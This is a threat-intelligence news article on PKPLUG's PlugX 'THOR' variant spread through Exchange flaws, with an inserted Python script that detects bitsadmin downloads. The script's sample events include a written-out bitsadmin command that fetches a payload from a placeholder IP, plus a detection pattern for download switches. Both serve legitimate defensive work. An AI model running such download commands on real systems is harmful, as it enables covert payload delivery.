A sophisticated cyberespionage operation has emerged, directly attributed to a Chinese group utilizing vulnerabilities in Microsoft Exchange Servers unveiled earlier this March. This group, identified as PKPLUG (also known as Mustang Panda and HoneyMyte), has executed a new attack sequence deploying an undocumented variant of a remote access trojan, dubbed THOR, to compromised systems.

The Unit 42 threat intelligence team at Palo Alto Networks reported that the intrusions are uniquely characterized by a modified version of the modular PlugX malware. This malware, with roots tracing back to 2008, operates as a fully-fledged second-stage implant. It equips attackers with the capability for file management, keystroke logging, webcam control, and remote command shell access, posing significant threats to targeted organizations.

The Unit 42 technical write-up highlights a significant alteration in this variant: a code shift switching the iconic term ‘PLUG’ to ‘THOR.’ The earliest sample of this rebranded malware, identified in August 2019, reveals new delivery mechanisms and the exploitation of trusted binaries, broadening its attack vector spectrum.

Following Microsoft’s announcement on March 2 about the zero-day vulnerabilities exploited by the China-based group known as Hafnium, a wave of threat actors, including ransomware groups and cryptocurrency mining operators, began leveraging these vulnerabilities to install web shells for higher-level access. PKPLUG’s tactics illustrate an advanced operational capability, as researchers note their ability to bypass antivirus detection through the utilization of legitimate Windows executables, such as BITSAdmin, to fetch seemingly benign files from remote repositories.
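The BITSAdmin download step described above is a common detection opportunity. The following is an added example (not from the Unit 42 report or the PKPLUG tooling) that triages constructed Sysmon-style process-creation events and flags `bitsadmin.exe` invocations that pull content from a remote URL; the events, hostnames and file names are made-up sample data.

```python
import re
from typing import Dict, List

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# The URL, IP and file name are placeholders, not indicators from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high "
                    r"http://198.51.100.23/update/payload.dat C:\Users\Public\payload.dat",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers",          # benign administrative use
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" https://example.com',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# bitsadmin switches that can register a remote source for a download job
REMOTE_SWITCHES = {"/transfer", "/addfile", "/create", "/resume"}


def is_suspicious_bits_download(event: Dict[str, str]) -> bool:
    """True when bitsadmin.exe is launched with a download switch and a remote URL."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\bitsadmin.exe"):
        return False
    cmd = event.get("CommandLine", "")
    tokens = {t.lower() for t in cmd.split()}
    return bool(tokens & REMOTE_SWITCHES) and URL_RE.search(cmd) is not None


def remote_urls(event: Dict[str, str]) -> List[str]:
    """Extract the remote source URLs from a flagged command line for blocking/pivoting."""
    return URL_RE.findall(event.get("CommandLine", ""))


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per suspicious event: the parent process and the URLs pulled."""
    return [{"parent": e.get("ParentImage", ""), "urls": remote_urls(e)}
            for e in events if is_suspicious_bits_download(e)]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

In production the same check would run over EDR or Sysmon telemetry rather than an inline list, and parent-process context (a web shell's worker process spawning `cmd.exe`, for instance) is what turns a hit into a high-confidence alert.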

The retrieved file contains an encrypted and compressed PlugX payload disguised as an advanced optimization tool, raising significant concerns regarding its potential to obscure malicious activities behind legitimate software capabilities. The latest PlugX sample houses diverse plug-in functionalities that empower attackers to surveil, modify, and interact with infected systems, amplifying their operational reach.

Unit 42’s findings delve into the command-and-control infrastructure linked to PKPLUG, revealing a pattern of behavior consistent with previously identified PlugX artifacts. For organizations seeking to bolster their defenses, further insights and indicators of compromise related to this incident are provided in Unit 42’s report. Additionally, a Python script for decrypting and unpacking PlugX payloads has been made publicly available by Unit 42, allowing stakeholders to better understand and mitigate these sophisticated threats.
